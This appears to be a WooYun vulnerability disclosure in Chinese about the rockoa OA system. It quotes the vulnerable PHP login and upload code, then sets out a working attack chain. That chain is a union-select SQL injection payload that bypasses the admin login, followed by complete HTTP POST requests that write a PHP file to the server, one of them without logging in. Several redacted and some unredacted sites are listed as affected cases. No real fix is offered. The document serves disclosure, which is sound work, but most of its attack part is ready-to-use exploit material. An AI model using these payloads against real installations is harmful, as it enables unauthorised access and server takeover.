当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158998

漏洞标题:rockoa系统sql注入(有条件限制)

相关厂商:rockoa

漏洞作者: 路人甲

提交时间:2015-12-08 10:14

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

0x01 后台bypass
C:/phpStudy/WWW/rockoa/webrock/login/loginAction.php

public function checkAjax()
	{
		$adminuser	= $this->post('adminuser');
		$adminpass	= $this->post('adminpass');
		$rempass	= $this->post('rempass');
		$jmpass		= $this->post('jmpass');
		$adminpass1	= $adminpass;
		if($jmpass == 'true')$adminpass=$this->jm->uncrypt($adminpass);
		$highpass	= HIGHPASS;
		$lglx		= '';
		$msg		= '';
		if($this->isempt($adminuser))$msg='帐号不能为空';
		$log		= m('log');
		if($msg==''){
			$us	= $this->db->getone('[Q]admin', "`user`='$adminuser' and `status`=1 and `type`=1 and `state`<>5",'`pass`,`id`,`name`,`user`,`style`');
			if(!$us){
				$msg = '帐号不存在';
			}else{
				$pass= $us['pass'];
				if(md5($adminpass)!=$pass)$msg='密码不对';
				if($adminpass==$highpass || $adminpass1 == $highpass){
					$msg='';
					$lglx = '超级密码';
				}	
			}
		}
		
		if($msg==''){
			$adminid	= $us['id'];
			$this->db->record('[Q]admin',"`loginci`=`loginci`+1,`lastdt`='$this->now',`lastip`='$this->ip'","`id`='$adminid'");
			$this->rock->savesession(array(
				QOM.'adminid'	=> $us['id'],
				QOM.'adminname'	=> $us['name'],
				QOM.'adminuser'	=> $us['user'],
				QOM.'adminstyle'=> $us['style']
			));
			
			$this->rock->savecookie(QOM.'ca_adminuser', $us['user']);
			$this->rock->savecookie(QOM.'ca_rempass', $rempass);
			$ca_adminpass	= $this->jm->encrypt($adminpass);
			if($rempass=='0')$ca_adminpass='';
			$this->rock->savecookie(QOM.'ca_adminpass', $ca_adminpass);
			$this->rock->savecookie(QOM.'ca_adminstyle', $us['style']);
			$msg='success';
			$log->addlog('登录','['.$adminuser.']'.$lglx.'登录成功', array('optid'=>$us['id'], 'optname'=>$us['name']));
		}else{
			$log->addlog('登录','['.$adminuser.']'.$msg.'');
		}
		echo $msg;
	}


在登陆的地方存在注入,但是会验证一次密码,所以我们通过union select 型的注入直接bypass,进入后台。
构造adminuser为

asd' union select '202cb962ac59075b964b07152d234b70',1,'管理员','admin',1#


adminpass为123
这样就可以直接进入后台了。

QQ20151206-0@2x.jpg


QQ20151206-1@2x.jpg


0x02 Getshell
第一种情况 需要登录,然后无限制getshell
C:/phpStudy/WWW/rockoa/mode/upload/uploadajax.php

if($action == 'send'){	
	if(!$_POST)exit('Sorry!,send');
	$sendci		= (int)$rock->post('sendci')+1;
	$maxsend	= (int)$rock->post('maxsend');
	$maxwidth	= (int)$rock->post('maxwidth');
	$thumbtype	= (int)$rock->post('thumbtype');
	$sendcont	= $rock->post('sendcont');
	$savetype	= $rock->post('savetype','temp');
	$filename	= $rock->post('filename');
	$filetype	= $rock->post('filetype');
	$fileext	= trim($rock->post('fileext'));
	$filesize	= $rock->post('filesize');
	$filesizecn	= $rock->post('filesizecn');
	$newfile	= $rock->post('newfile');
	$mkdir		= $rock->post('mkdir');
	$savepath	= $rock->post('savepath');//另存路径
	$thumbnail	= $rock->post('thumbnail');
}
$smkdir		= '../../upload/'.$mkdir.'';
if(!file_exists($smkdir))mkdir($smkdir);
$allfile	= ''.$smkdir.'/'.$newfile.'';
$tempfile	= $allfile.'.temp';
$filepath	= substr($tempfile,3);
$thumbpath	= '';//所累图地址
$width		= 0;
$height		= 0;
$fc	= fopen($tempfile, 'a');
fwrite($fc,$sendcont);
fclose($fc);
$id	= 0;
if($sendci==$maxsend){
	
	$optid	= (int)$rock->session(QOM.'adminid',0);
	$imgext	= '|jpg|gif|png|jpeg|bmp|';
	$boolc	= $rock->contain($imgext, '|'.$fileext.'|');
	$ztfile	= $imgext.'doc|docx|xls|xlsx|ppt|pptx|pdf|swf|rar|zip|txt|gz|wav|mp3|wma|chm|';
	$botxtl	= $rock->contain($ztfile,'|'.$fileext.'|');
	$boolc1	= $rock->isempt($savepath);
	if(!$boolc1 && $optid==0)$boolc1 = true;
	$izztbo = false;
	if(!$boolc1 || $botxtl)$izztbo = true;
	if($izztbo){
		$content	= file_get_contents($tempfile);
		$temp1file	= ''.$allfile.'.'.$fileext.'';
		$a64basec	= base64_decode($content);
		
		if(!$boolc1){
			file_put_contents(ROOT_PATH.''.$savepath.''.iconv('utf-8','gb2312',$filename).'', $a64basec);
			unlink($tempfile);
		}else{
			file_put_contents($temp1file, $a64basec);
			unlink($tempfile);
			if($boolc){
				list($width, $height) = getimagesize($temp1file);
				if($rock->isempt($width)){
					$width = 0;
					$height = 0;
				}
			}
		}
		$filepath	= substr($temp1file,3);	
	}
	$filepath	= str_replace('../','',$filepath);
	$thumbpath	= $filepath;


这段代码的意思就是先生成一个temp文件,其中内容是base64过的,然后从temp文件里面读取内容并且base64解码一次,然后写入文件中。

file_put_contents(ROOT_PATH.''.$savepath.''.iconv('utf-8','gb2312',$filename).'', $a64basec);


其中savepath和filename变量我们都可以控制,这样就可以写shell了。
在进入这个流程之前,还有两个逻辑判断要izztbo变量为真 boolc1变量为假
其中if(!$boolc1 || $botxtl)$izztbo = true; 只要一个为真就行,由于boolc1又savepath是否为空的来,我们只要给savepath赋值即可。最好构造这样的数据包

POST /rockoa/mode/upload/uploadajax.php?action=send&rnd=0.11527019962152985&p=webrock HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/rockoa/mode/upload/upload.php?callback=rock.up1449383669147_6905&upkey=20151206143456244282&p=webrock&title=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params1=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params2=141&opennew=true
Content-Length: 222
Cookie: rock_ca_adminuser=admin; rock_ca_rempass=0; rock_ca_adminstyle=1; PHPSESSID=gkuo4ai9bcbciioepdv7u84k17
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sendcont=PD9waHAgcGhwaW5mbygpPz4=&filename=aax.php&maxsend=1&sendci=0&filetype=text%2Fphp&fileext=php&filesize=9145&filesizecn=8.93+KB&mkdir=2015-12&newfile=06_1435027893&savepath=/upload/&thumbnail=&maxwidth=0&thumbtype=0


就可以在upload下生成一个aax.php的shell
第二种情况 无需登录,但是有限制条件
由于没有登录所以$optid = (int)$rock->session(QOM.'adminid',0);获取的opted的值为0 在后面这个判断if(!$boolc1 && $optid==0)$boolc1 = true;导致boolc1为真,所以后面的流程都不能进去,就只能写一个tempfile 了,由于$tempfile = $allfile.'.temp'; 所以只能配合apache的解析漏洞或者iis的解析漏洞利用了,直接构造数据包

POST /rockoa/mode/upload/uploadajax.php?action=send&rnd=0.11527019962152985&p=webrock HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/rockoa/mode/upload/upload.php?callback=rock.up1449383669147_6905&upkey=20151206143456244282&p=webrock&title=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params1=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params2=141&opennew=true
Content-Length: 211
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sendcont=<?php phpinfo()?>&filename=aax.php&maxsend=1&sendci=0&filetype=text%2Fphp&fileext=php&filesize=9145&filesizecn=8.93+KB&mkdir=2015-12&newfile=test.php&savepath1=/upload/&thumbnail=&maxwidth=0&thumbtype=0


然后生成

{success:true, msg:"246",filepath:"upload/2015-12/test.php.temp", sendci:1, thumbpath:"upload/2015-12/test.php.temp",width:0,height:0}


随便测试了一个

http://**.**.**.**/upload/2015-12/test.php.php


漏洞证明:

QQ20151206-0@2x.jpg


QQ20151206-1@2x.jpg


QQ20151207-0@2x.jpg

QQ20151207-1@2x.jpg


案例

http://**.**.**.**/
 http://**.**.**.**/
 http://**.**.**.**/
 http://**.**.**.**/
 http://**.**.**.**/
 http://**.**.**.**/
 http://**.**.**.**/
 http://**.**.**.**daik.pw/
 http://the18.club/
 http://**.**.**.**/

修复方案:

你们专业

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝